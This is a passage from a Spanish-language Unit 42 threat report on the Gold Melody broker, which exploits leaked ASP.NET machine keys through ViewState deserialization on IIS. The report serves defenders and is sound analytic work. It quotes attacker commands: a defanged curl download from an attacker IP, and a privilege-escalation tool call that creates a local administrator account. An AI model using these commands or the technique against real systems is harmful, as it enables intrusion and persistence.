{"id":157356,"date":"2025-07-08T11:15:19","date_gmt":"2025-07-08T18:15:19","guid":{"rendered":"https:\/\/unit42.paloaltonetworks.com\/?p=157356"},"modified":"2025-09-15T11:52:36","modified_gmt":"2025-09-15T18:52:36","slug":"initial-access-broker-exploits-leaked-machine-keys","status":"publish","type":"post","link":"https:\/\/unit42.paloaltonetworks.com\/es-la\/initial-access-broker-exploits-leaked-machine-keys\/","title":{"rendered":"Acordes ocultos de GoldMelody: se develaron los m\u00f3dulos de IIS en memoria del intermediario de acceso inicial"},"content":{"rendered":"<h2><a id=\"post-157356-_heading=h.36v8v44rojwl\"><\/a>Resumen ejecutivo<\/h2>\n<p>Los investigadores de Unit\u00a042 descubrieron una campa\u00f1a de un intermediario de acceso inicial (IAB) para explotar claves de m\u00e1quina filtradas (claves criptogr\u00e1ficas utilizadas en sitios ASP.NET) con el fin de obtener acceso a organizaciones objetivo. Los IAB vulneran organizaciones y luego venden ese acceso a otros actores de amenazas.<\/p>\n<p>En este informe, se analizan las herramientas utilizadas en estos ataques. Realizamos un seguimiento de este actor como el <a href=\"https:\/\/unit42.paloaltonetworks.com\/from-activity-to-formal-naming\/\" target=\"_blank\" rel=\"noopener\">grupo temporal<\/a> TGR-CRI-0045. El grupo parece seguir un enfoque oportunista, pero ha atacado a organizaciones de Europa y Estados Unidos en los siguientes sectores: servicios financieros, fabricaci\u00f3n, venta mayorista y minorista, alta tecnolog\u00eda y transporte y log\u00edstica.<\/p>\n<p>El IAB utiliz\u00f3 estas claves filtradas para firmar cargas \u00fatiles maliciosas que proporcionan acceso no autorizado a los servidores objetivo, en una t\u00e9cnica denominada deserializaci\u00f3n de View State en ASP.NET. Esta t\u00e9cnica le permit\u00eda al IAB ejecutar cargas \u00fatiles maliciosas directamente en la memoria del servidor, lo que minimizaba la presencia en el disco y dejaba pocos artefactos forenses, lo que dificultaba la detecci\u00f3n.<\/p>\n<p>Atribuimos el grupo temporal TGR-CRI-0045, con una confianza media, a Gold Melody (alias UNC961, Prophet Spider). Esta evaluaci\u00f3n se basa en coincidencias en lo siguiente:<\/p>\n<ul>\n<li>Indicadores de vulneraci\u00f3n (IoC)<\/li>\n<li>T\u00e1cticas, t\u00e9cnicas y procedimientos (TTP)<\/li>\n<li>Victimolog\u00eda<\/li>\n<\/ul>\n<p>En este informe, tambi\u00e9n se analizan la infraestructura de TGR-CRI-0045 y las herramientas utilizadas para recopilar informaci\u00f3n sobre otros sistemas de la red y mantener el acceso a los sistemas explotados. Las herramientas parecen estar en desarrollo activo.<\/p>\n<p>Los primeros indicios de explotaci\u00f3n e implementaci\u00f3n de herramientas se produjeron en octubre de 2024, con un aumento significativo de la actividad entre finales de enero y marzo de 2025. Esta oleada incluy\u00f3 la implementaci\u00f3n de herramientas posteriores a la explotaci\u00f3n, como esc\u00e1neres de puertos de c\u00f3digo abierto y utilidades personalizadas para la persistencia (mantenimiento del acceso) y la escalada de privilegios (obtenci\u00f3n de acceso de nivel superior).<\/p>\n<p>Identificamos o respondimos a incidentes en aproximadamente una docena de organizaciones afectadas por esta amenaza. En la mayor\u00eda de los casos, identificamos las claves de m\u00e1quina expuestas como la causa ra\u00edz. Por lo tanto, recomendamos encarecidamente que las organizaciones revisen <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/06\/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys\/\" target=\"_blank\" rel=\"noopener\">la gu\u00eda de Microsoft<\/a> sobre la identificaci\u00f3n y la correcci\u00f3n de claves de m\u00e1quina comprometidas para sitios ASP.NET en Internet Information Services (IIS) en su entorno.<\/p>\n<p>Los clientes de Palo Alto Networks est\u00e1n mejor protegidos de las herramientas analizadas en este art\u00edculo gracias a los siguientes productos y servicios:<\/p>\n<ul>\n<li>Los modelos de aprendizaje autom\u00e1tico y las t\u00e9cnicas de an\u00e1lisis de <a href=\"https:\/\/docs.paloaltonetworks.com\/wildfire\" target=\"_blank\" rel=\"noopener\">Advanced WildFire<\/a> se han revisado y actualizado a la luz de los indicadores compartidos en esta investigaci\u00f3n.<\/li>\n<li><a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XDR\" target=\"_blank\" rel=\"noopener\">Cortex XDR<\/a> y <a href=\"https:\/\/docs-cortex.paloaltonetworks.com\/p\/XSIAM\" target=\"_blank\" rel=\"noopener\">XSIAM <\/a>proporciona protecciones listas para usar para exploits de deserializaci\u00f3n IIS con el m\u00f3dulo de protecci\u00f3n IIS.<\/li>\n<\/ul>\n<p>Si cree que puede haber resultado vulnerado o tiene un problema urgente, p\u00f3ngase en contacto con el <a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">equipo de respuesta ante incidentes de Unit\u00a042<\/a>.<\/p>\n<table style=\"width: 97.345%;\">\n<thead>\n<tr>\n<td style=\"width: 35%;\"><b>Temas relacionados con Unit\u00a042<\/b><\/td>\n<td style=\"width: 223.443%;\"><a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/microsoft-es-la\/\" target=\"_blank\" rel=\"noopener\"><b>Microsoft<\/b><\/a>, <strong><a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/web-shells-es-la\/\" target=\"_blank\" rel=\"noopener\">Web Shells<\/a><\/strong>, <a href=\"https:\/\/unit42.paloaltonetworks.com\/es-la\/tag\/golang-es-la\/\" target=\"_blank\" rel=\"noopener\"><b>Golang<\/b><\/a><\/td>\n<\/tr>\n<\/thead>\n<\/table>\n<h2><a id=\"post-157356-_heading=h.o2pbf6qu5ozy\"><\/a>An\u00e1lisis t\u00e9cnico<\/h2>\n<h3><a id=\"post-157356-_heading=h.lis3bv84jfm\"><\/a>C\u00f3mo la b\u00fasqueda de amenazas gestionada descubri\u00f3 TGR-CRI-0045: aumento de la explotaci\u00f3n<\/h3>\n<p>Entre el 30\u00a0de\u00a0enero y el 2\u00a0de\u00a0febrero de 2025, respondimos a intrusiones en servidores web en dos entornos de clientes. En ambos casos, las intrusiones implicaban la ejecuci\u00f3n de comandos shell originados en un proceso de trabajo en IIS (w3wp.exe). Estas intrusiones ten\u00edan las siguientes caracter\u00edsticas en com\u00fan:<\/p>\n<ul>\n<li>Invocaci\u00f3n de <span style=\"font-family: 'courier new', courier, monospace;\">cmd.exe<\/span> utilizando la redirecci\u00f3n de salida <span style=\"font-family: 'courier new', courier, monospace;\">stdout<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">stderr: cmd\u00a0\/c your_command_here 2&gt;&amp;1<\/span><\/li>\n<li>Directorio de etapas: <span style=\"font-family: 'courier new', courier, monospace;\">C:\\Windows\\Temp\\111t<\/span><\/li>\n<li>Archivo recuperado mediante <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> desde: <span style=\"font-family: 'courier new', courier, monospace;\">hxxp:\/\/195.123.240[.]233:443\/atm<\/span><\/li>\n<\/ul>\n<h3><a id=\"post-157356-_heading=h.r1el8fqzeptu\"><\/a>Investigaci\u00f3n m\u00e1s amplia<\/h3>\n<p>Inesperadamente, la investigaci\u00f3n de los endpoints afectados no revel\u00f3 ning\u00fan shell web cargado recientemente. Sin embargo, al ampliar la investigaci\u00f3n se revel\u00f3 la misma invocaci\u00f3n de cmd.exe y el mismo uso indebido del directorio de montaje en las intrusiones manuales de otros inquilinos.<\/p>\n<p>La telemetr\u00eda confirm\u00f3 que el atacante ejecutaba comandos cargando ensamblados .NET gestionados (c\u00f3digo C#) directamente en la memoria (carga reflexiva). Este exploit ten\u00eda como objetivo View State, un par\u00e1metro interno de los sitios ASP.NET que se ejecuta en <a href=\"https:\/\/www.iis.net\/\" target=\"_blank\" rel=\"noopener\">Microsoft\u00a0IIS<\/a> mediante la deserializaci\u00f3n de una carga maliciosa. La deserializaci\u00f3n es el proceso de convertir los datos codificados para el tr\u00e1nsito o el almacenamiento en el estado interno de la aplicaci\u00f3n. Como <a href=\"https:\/\/www.microsoft.com\/en-us\/security\/blog\/2025\/02\/06\/code-injection-attacks-using-publicly-disclosed-asp-net-machine-keys\/\" target=\"_blank\" rel=\"noopener\">inform\u00f3 MSTIC,<\/a> esta explotaci\u00f3n fue probablemente posible gracias al uso por parte de las v\u00edctimas de claves de m\u00e1quina est\u00e1ticas y expuestas en sus aplicaciones.<\/p>\n<p>Los informes p\u00fablicos sobre la explotaci\u00f3n de vulnerabilidades de IIS por parte de actores de amenazas con motivaciones financieras son limitados. En este informe, se pretende abordar esta carencia al proporcionar informaci\u00f3n sobre el oficio de los atacantes y contribuir a la creciente comprensi\u00f3n de la explotaci\u00f3n de la deserializaci\u00f3n en .NET. Nuestro objetivo es capacitar a los defensores para que respondan eficazmente a estas amenazas.<\/p>\n<h3><a id=\"post-157356-_heading=h.mz178q9j4y2y\"><\/a>C\u00f3mo TGR-CRI-0045 explotaba los servidores de las v\u00edctimas<\/h3>\n<h4><a id=\"post-157356-_heading=h.ek9pjxiy2y1m\"><\/a>Introducci\u00f3n a la explotaci\u00f3n de View State en IIS y ASP.NET<\/h4>\n<p>A fin de entender el acceso de TGR-CRI-0045 es necesario explicar las funciones de IIS, ASP.NET y View State, y c\u00f3mo el material clave comprometido permite la ejecuci\u00f3n remota de c\u00f3digo. IIS es un servidor web compatible con varias tecnolog\u00edas de aplicaciones web, incluida ASP.NET. Este marco permite a los desarrolladores crear aplicaciones din\u00e1micas del lado del servidor con lenguajes .NET, como C# y VB.NET.<\/p>\n<p>Los sitios web ASP.NET utilizan View State para gestionar las interacciones entre el navegador del usuario y el servidor. View State mantiene el estado de los controles del frontend (por ejemplo, casillas de verificaci\u00f3n y campos de entrada) entre solicitudes, almacenando esta informaci\u00f3n en un par\u00e1metro HTTP oculto llamado<span style=\"font-family: 'courier new', courier, monospace;\"> __VIEWSTATE<\/span>, incluido en todas las solicitudes. Este par\u00e1metro es vulnerable a varias t\u00e9cnicas de deserializaci\u00f3n de .NET que pueden permitir la ejecuci\u00f3n remota de c\u00f3digo si el atacante conoce la clave utilizada para protegerlo.<\/p>\n<p>Las claves de m\u00e1quina, que consisten en una ValidationKey (clave de validaci\u00f3n) (para la integridad) y una DecryptionKey (clave de descifrado) opcional, protegen los View States de ASP.NET de la manipulaci\u00f3n por defecto. Sin embargo, los atacantes pueden aprovechar las listas p\u00fablicas de claves de m\u00e1quina filtradas que suelen estar presentes en los sitios de producci\u00f3n debido a la reutilizaci\u00f3n del c\u00f3digo (a lo que se hace referencia al final de este art\u00edculo).<\/p>\n<p>Los atacantes tambi\u00e9n pueden extraer claves de m\u00e1quina directamente de los servidores en ejecuci\u00f3n. Con un conjunto v\u00e1lido de claves de m\u00e1quina, un atacante puede crear una carga \u00fatil de deserializaci\u00f3n maliciosa, atacar un servidor vulnerable y ejecutar c\u00f3digo arbitrario en el contexto del proceso de trabajo de IIS.<\/p>\n<p>El alcance potencial de este ataque es significativo. Los View States se transmiten independientemente del sitio o la aplicaci\u00f3n espec\u00edficos que se ejecuten en ASP.NET, incluso si est\u00e1n desactivados para un componente concreto. Cualquier servidor de IIS que ejecute un sitio ASP.NET con claves de m\u00e1quina comprometidas probablemente sea vulnerable. Si desea leer una explicaci\u00f3n detallada de c\u00f3mo los actores de amenazas almacenan y acceden a las claves de m\u00e1quina, le recomendamos <a href=\"https:\/\/zeroed.tech\/blog\/viewstate-the-unpatchable-iis-forever-day-being-actively-exploited\/\" target=\"_blank\" rel=\"noopener\">esta publicaci\u00f3n en el blog de Zeroed.tech<\/a>.<\/p>\n<h4><a id=\"post-157356-_heading=h.q2gx28a9qa8t\"><\/a>Generaci\u00f3n y ejecuci\u00f3n de cargas \u00fatiles de View State<\/h4>\n<p>TGR-CRI-0045 probablemente utiliz\u00f3 herramientas como <span style=\"font-family: 'courier new', courier, monospace;\">ysoserial.net<\/span>, un generador de carga \u00fatil de deserializaci\u00f3n .NET de c\u00f3digo abierto, y su <a href=\"https:\/\/github.com\/pwntester\/ysoserial.net\/blob\/master\/ysoserial\/Plugins\/ViewStatePlugin.cs\" target=\"_blank\" rel=\"noopener\">plugin View State<\/a> para construir cargas \u00fatiles maliciosas de deserializaci\u00f3n que:<\/p>\n<ul>\n<li>Eludieron la protecci\u00f3n de View State utilizando claves de m\u00e1quina preexpuestas para crear firmas criptogr\u00e1ficas v\u00e1lidas, evitando las protecciones integradas de View State. (A menudo, los sitios comprometidos ten\u00edan archivos <span style=\"font-family: 'courier new', courier, monospace;\">web.config<\/span> que conten\u00edan claves de m\u00e1quina que estaban presentes en listas de denegaci\u00f3n conocidas).<\/li>\n<li>Utilizaron el m\u00e9todo <a href=\"https:\/\/github.com\/pwntester\/ysoserial.net\/blob\/master\/ysoserial\/Generators\/XamlAssemblyLoadFromFileGenerator.cs\" target=\"_blank\" rel=\"noopener\"><span style=\"font-family: 'courier new', courier, monospace;\">XamlAssemblyLoadFromFile<\/span> gadget<\/a>, un gadget de deserializaci\u00f3n basado en datos con formato XAML para:\n<ul>\n<li>Desencadenar la deserializaci\u00f3n maliciosa.<\/li>\n<li>Cargar y ejecutar un ensamblado .NET en la memoria desde un flujo gzip codificado en Base64 contenido en el par\u00e1metro <span style=\"font-family: 'courier new', courier, monospace;\">__VIEWSTATE<\/span>.<\/li>\n<\/ul>\n<\/li>\n<\/ul>\n<p>Los ensamblados .NET cargados tienen el mismo ciclo de vida que la solicitud HTTP de entrega. El atacante lanza una carga \u00fatil de exploit y el servidor objetivo la procesa. La carga \u00fatil se ejecuta utilizando par\u00e1metros de entrada agrupados en la misma solicitud y devuelve la salida a la solicitud de origen a trav\u00e9s de la respuesta HTTP.<\/p>\n<p>Una vez procesada, la carga \u00fatil no puede reutilizarse. Este exploit \u201cde un solo intento\u201d requiere un intento independiente para cada comando, lo que resulta en una proporci\u00f3n de 1:1 entre los intentos de exploit y las ejecuciones de comandos. En la Figura\u00a01 a continuaci\u00f3n, se muestra este proceso.<\/p>\n<figure id=\"attachment_157425\" aria-describedby=\"caption-attachment-157425\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157425 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/es-LA-VIEWSTATE-786x321.png\" alt=\"Diagrama que representa un proceso de solicitud y respuesta HTTP. Incluye iconos que representan una configuraci\u00f3n, un usuario, un servidor y un documento. Los cuadros de texto muestran elementos del proceso, como URL y m\u00e9todos HTTP como GET y POST, junto con las respuestas.\" width=\"1000\" height=\"408\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/es-LA-VIEWSTATE-786x321.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/es-LA-VIEWSTATE-1715x700.png 1715w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/es-LA-VIEWSTATE-768x313.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/es-LA-VIEWSTATE-1536x627.png 1536w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/es-LA-VIEWSTATE.png 1789w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-157425\" class=\"wp-caption-text\">Figura 1. Flujo evaluado de las acciones del operador para construir una carga \u00fatil, y c\u00f3mo se le env\u00eda una respuesta.<\/figcaption><\/figure>\n<h3><a id=\"post-157356-_heading=h.vgtnb5qzszro\"><\/a>Recuperaci\u00f3n y an\u00e1lisis de m\u00f3dulos TGR-CRI-0045 en IIS<\/h3>\n<p>En los entornos comprometidos, identificamos subconjuntos de los siguientes cinco ensamblados .NET cargados en la memoria luego de una explotaci\u00f3n exitosa de View State:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\"><strong>Cmd \/c<\/strong><\/span>: identificamos tres subvariantes, cada una de las cuales utiliza diferentes par\u00e1metros HTTP para pasar un comando al shell de comandos del sistema. Esto permit\u00eda al atacante ejecutar comandos arbitrarios en el servidor.<\/li>\n<li><strong>Carga de archivos<\/strong>: permit\u00eda al atacante subir archivos al servidor especificando una ruta de archivo de destino y un b\u00fafer de bytes con el contenido del archivo.<\/li>\n<li><strong>Ganador<\/strong>: probablemente se trataba de una comprobaci\u00f3n de explotaci\u00f3n que informaba al atacante de una victoria, confirmando que la explotaci\u00f3n hab\u00eda tenido \u00e9xito.<\/li>\n<li><strong>Descarga de archivos<\/strong>: (no recuperado) bas\u00e1ndose en las funciones importadas, este m\u00f3dulo parece ser un descargador que permite al atacante recuperar datos sensibles del servidor comprometido.<\/li>\n<li><strong>Cargador reflectante<\/strong>: (no recuperado) bas\u00e1ndose en las funciones importadas, este m\u00f3dulo parece ser un cargador reflexivo que le permite al atacante cargar y ejecutar de forma din\u00e1mica ensamblados .NET adicionales en la memoria sin escribirlos en el disco.<\/li>\n<\/ul>\n<p>Los ensamblados recuperados tienen caracter\u00edsticas en com\u00fan de tratamiento de datos. Parece que utilizan una clave XOR simple de un solo car\u00e1cter (x) para descifrar cargas \u00fatiles incrustadas en par\u00e1metros HTTP.<\/p>\n<p>Los ensamblados tambi\u00e9n parecen llamar a <span style=\"font-family: 'courier new', courier, monospace;\">httpContext.response.Flush()<\/span> seguido de <span style=\"font-family: 'courier new', courier, monospace;\">httpContext.response.End()<\/span> para finalizar las respuestas HTTP. Esto probablemente reduce la cantidad de datos forenses generados cuando ASP.NET no consigue deserializar correctamente las cargas \u00fatiles maliciosas, lo que dificulta la detecci\u00f3n y la respuesta ante incidentes.<\/p>\n<p>El nombre de ensamblado\u00a0<span style=\"font-family: 'courier new', courier, monospace;\">E<\/span>, que es el nombre predeterminado de la clase <span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/github.com\/pwntester\/ysoserial.net\/blob\/master\/ExploitClass\/ExploitClass.cs\" target=\"_blank\" rel=\"noopener\">ExploitClass en ysoserial.net<\/a><\/span>, es el m\u00e1s frecuente. Para evitar conflictos de nomenclatura, el atacante cambi\u00f3 el nombre de algunos m\u00f3dulos (por ejemplo, Dw y d).<\/p>\n<p>En las Figuras\u00a02 a 6, se muestra el c\u00f3digo fuente de los m\u00f3dulos recuperados, que probablemente se escribieron como archivos <span style=\"font-family: 'courier new', courier, monospace;\">.cs<\/span> de C#. La compilaci\u00f3n (transformaci\u00f3n del c\u00f3digo fuente en c\u00f3digo ejecutable) var\u00eda en funci\u00f3n del gadget de <span style=\"font-family: 'courier new', courier, monospace;\">ysoserial.net<\/span> utilizado. Observamos con mayor frecuencia el gadget <span style=\"font-family: 'courier new', courier, monospace;\">XamlAssemblyLoadFromFile<\/span>, que compila el ensamblado .NET en el sistema del atacante durante la explotaci\u00f3n y lo transmite al servidor de destino para que se ejecute en la memoria.<\/p>\n<p><strong>Cargas \u00fatiles de Cmd<\/strong><\/p>\n<figure id=\"attachment_157369\" aria-describedby=\"caption-attachment-157369\" style=\"width: 830px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157369 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165155-157356-2.png\" alt=\"Captura de pantalla de un fragmento de c\u00f3digo en un editor de texto con sintaxis resaltada. El c\u00f3digo implica gestionar una excepci\u00f3n, iniciar un proceso para ejecutar 'cmd.exe', redirigir la entrada y la salida est\u00e1ndar y borrar el contexto HTTP. La interfaz del editor utiliza el modo oscuro y muestra los n\u00fameros de l\u00ednea junto al c\u00f3digo.\" width=\"830\" height=\"786\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165155-157356-2.png 830w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165155-157356-2-465x440.png 465w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165155-157356-2-739x700.png 739w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-165155-157356-2-768x727.png 768w\" sizes=\"(max-width: 830px) 100vw, 830px\" \/><figcaption id=\"caption-attachment-157369\" class=\"wp-caption-text\">Figura\u00a02. Fuente de la carga \u00fatil de la variante <span style=\"font-family: 'courier new', courier, monospace;\">cmd\u00a0\/c<\/span> con encabezados <span style=\"font-family: 'courier new', courier, monospace;\">sec-fetch-mode<\/span>.<\/figcaption><\/figure>\n<figure id=\"attachment_157380\" aria-describedby=\"caption-attachment-157380\" style=\"width: 781px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157380 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-168290-157356-3.png\" alt=\"Captura de pantalla de c\u00f3digo inform\u00e1tico en un editor de texto, con funciones y comandos relacionados con el contexto HTTP y los procesos del sistema, incluidas referencias a la gesti\u00f3n de errores y la obtenci\u00f3n de argumentos de la l\u00ednea de comandos.\" width=\"781\" height=\"626\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-168290-157356-3.png 781w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-168290-157356-3-549x440.png 549w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-168290-157356-3-768x616.png 768w\" sizes=\"(max-width: 781px) 100vw, 781px\" \/><figcaption id=\"caption-attachment-157380\" class=\"wp-caption-text\">Figura 3. Fuente de la variante <span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c<\/span> con encabezado <span style=\"font-family: 'courier new', courier, monospace;\">cmd<\/span>.<\/figcaption><\/figure>\n<figure id=\"attachment_157391\" aria-describedby=\"caption-attachment-157391\" style=\"width: 830px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157391 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-171397-157356-4.png\" alt=\"Captura de pantalla de c\u00f3digo inform\u00e1tico con sintaxis resaltada. El c\u00f3digo incluye funciones y comentarios relacionados con la gesti\u00f3n de errores y las operaciones de contexto HTTP.\" width=\"830\" height=\"1089\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-171397-157356-4.png 830w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-171397-157356-4-335x440.png 335w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-171397-157356-4-534x700.png 534w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-171397-157356-4-768x1008.png 768w\" sizes=\"(max-width: 830px) 100vw, 830px\" \/><figcaption id=\"caption-attachment-157391\" class=\"wp-caption-text\">Figura 4. Fuente de la variante <span style=\"font-family: 'courier new', courier, monospace;\">cmd \/c<\/span> con el par\u00e1metro <span style=\"font-family: 'courier new', courier, monospace;\">__Value<\/span> y cifrado XOR de un solo car\u00e1cter.<\/figcaption><\/figure>\n<p><strong>Carga de archivos<\/strong><\/p>\n<figure id=\"attachment_157402\" aria-describedby=\"caption-attachment-157402\" style=\"width: 500px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157402 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-174897-157356-5.png\" alt=\"Captura de pantalla de un editor de c\u00f3digo inform\u00e1tico que muestra un c\u00f3digo con diversas funciones, incluidas operaciones con matrices y gesti\u00f3n de contextos HTTP. El c\u00f3digo tiene sintaxis resaltada y se muestra en modo oscuro. \" width=\"500\" height=\"487\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-174897-157356-5.png 1027w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-174897-157356-5-452x440.png 452w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-174897-157356-5-719x700.png 719w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-174897-157356-5-768x748.png 768w\" sizes=\"(max-width: 500px) 100vw, 500px\" \/><figcaption id=\"caption-attachment-157402\" class=\"wp-caption-text\">Figura 5. Fuente del ensamblado de carga de archivos que toma una ruta y el contenido del archivo en los par\u00e1metros <span style=\"font-family: 'courier new', courier, monospace;\">__Fvalue<\/span> y <span style=\"font-family: 'courier new', courier, monospace;\">__Bvalue<\/span>, respectivamente.<\/figcaption><\/figure>\n<p><strong>Comprobador de exploits<\/strong><\/p>\n<figure id=\"attachment_157413\" aria-describedby=\"caption-attachment-157413\" style=\"width: 826px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-157413 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-178385-157356-6.png\" alt=\"Captura de pantalla de un c\u00f3digo inform\u00e1tico en un editor con sintaxis resaltada y utilizando HttpContext. \" width=\"826\" height=\"531\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-178385-157356-6.png 826w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-178385-157356-6-684x440.png 684w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/09\/word-image-178385-157356-6-768x494.png 768w\" sizes=\"(max-width: 826px) 100vw, 826px\" \/><figcaption id=\"caption-attachment-157413\" class=\"wp-caption-text\">Figura 6. Fuente del ensamblaje del comprobador de exploits que simplemente devuelve al operador <span style=\"font-family: 'courier new', courier, monospace;\">u a win<\/span> para indicar que la explotaci\u00f3n tuvo \u00e9xito.<\/figcaption><\/figure>\n<h4><a id=\"post-157356-_heading=h.1myy76rtydhl\"><\/a>Uso operativo de los ensamblajes<\/h4>\n<p>Entre octubre de 2024 y enero de 2025, la actividad del actor de amenazas se centr\u00f3 principalmente en explotar sistemas, implementar m\u00f3dulos, como el comprobador de exploits, y realizar un reconocimiento b\u00e1sico del shell.<\/p>\n<h3><a id=\"post-157356-_heading=h.oo9iajuck8bq\"><\/a>Postexplotaci\u00f3n con control manual<\/h3>\n<p>La actividad posterior a la explotaci\u00f3n consisti\u00f3, principalmente, en el reconocimiento del host comprometido y la red circundante. No hab\u00edamos observado movimiento lateral hasta principios de junio.<\/p>\n<p>Una caracter\u00edstica consistente en todas las intrusiones observadas fue que TGR-CRI-0045 utilizaba <span style=\"font-family: 'courier new', courier, monospace;\">C:\\Windows\\Temp\\111t<\/span> como directorio de almacenamiento de herramientas y datos. En algunas instancias aisladas, observamos que el actor de amenazas interactuaba con el directorio <span style=\"font-family: 'courier new', courier, monospace;\">C:\\Windows\\Temp\\gen_py,<\/span> pero no encontramos pruebas de que all\u00ed almacenara herramientas o datos exfiltrados.<\/p>\n<h4><a id=\"post-157356-_heading=h.fepqscylyrho\"><\/a>Escalada local de privilegios y persistencia<\/h4>\n<p>El actor de amenazas principalmente logr\u00f3 la escalada de privilegios local utilizando un binario\u00a0C# personalizado llamado <span style=\"font-family: 'courier new', courier, monospace;\">updf<\/span>. Es probable que este nombre se utilizara para disfrazar el archivo como el editor de PDF llamado UPDF.<\/p>\n<p>El binario u<span style=\"font-family: 'courier new', courier, monospace;\">pdf<\/span> parece estar en desarrollo activo, seg\u00fan las caracter\u00edsticas parcialmente implementadas en su c\u00f3digo base. Utiliza el <a href=\"https:\/\/github.com\/BeichenDream\/GodPotato\" target=\"_blank\" rel=\"noopener\">exploit GodPotato<\/a> que hace un mal uso de las tuber\u00edas con nombre de Windows para hacerse pasar por un servicio privilegiado (por ejemplo, <span style=\"font-family: 'courier new', courier, monospace;\">epmapper<\/span>) y obtener acceso a nivel de SISTEMA.<\/p>\n<p>Aunque <span style=\"font-family: 'courier new', courier, monospace;\">updf<\/span> puede ejecutar comandos con privilegios de SISTEMA, se utiliza m\u00e1s com\u00fanmente para crear un nuevo usuario local y a\u00f1adirlo al grupo de administradores locales:<\/p>\n<ul>\n<li><span style=\"font-family: 'courier new', courier, monospace;\">c:\\windows\\temp\\111t\\updf.exe -nadm 'support:Sup0rt_1!admin'<\/span><\/li>\n<\/ul>\n<p>En un caso, TGR-CRI-0045 export\u00f3 archivos <span style=\"font-family: 'courier new', courier, monospace;\">web.config<\/span> (archivos de configuraci\u00f3n de ASP.NET) y modific\u00f3 la configuraci\u00f3n de una p\u00e1gina espec\u00edfica a <span style=\"font-family: 'courier new', courier, monospace;\">&lt;allow users=\"*\"\/&gt;<\/span>, lo que potencialmente evitaba la autenticaci\u00f3n para el acceso alternativo al servidor. No pudimos confirmar si esta p\u00e1gina modificada era una p\u00e1gina vulnerable existente que era reexplotable por TGR-CRI-0045 o un shell web basado en disco.<\/p>\n<h4><a id=\"post-157356-_heading=h.3t2seovyuh79\"><\/a>Descarga de un binario por etapas<\/h4>\n<p>La mayor\u00eda de las intrusiones observadas implicaron el uso de <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> o <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> para descargar un binario ELF llamado <span style=\"font-family: 'courier new', courier, monospace;\">atm<\/span>. Si el atacante utiliz\u00f3 <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span>, era probable que ya existiera en los hosts. Si utiliz\u00f3 <span style=\"font-family: 'courier new', courier, monospace;\">wget.exe<\/span>, es probable que lo subiera a los servidores objetivo al ejecutar la carga \u00fatil de subida de archivos. El binario <span style=\"font-family: 'courier new', courier, monospace;\">atm<\/span> podr\u00eda dar soporte a actividades maliciosas en servidores Linux, si se produjera un movimiento lateral. El siguiente es un ejemplo de un comando <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> utilizado para descargar el binario <span style=\"font-family: 'courier new', courier, 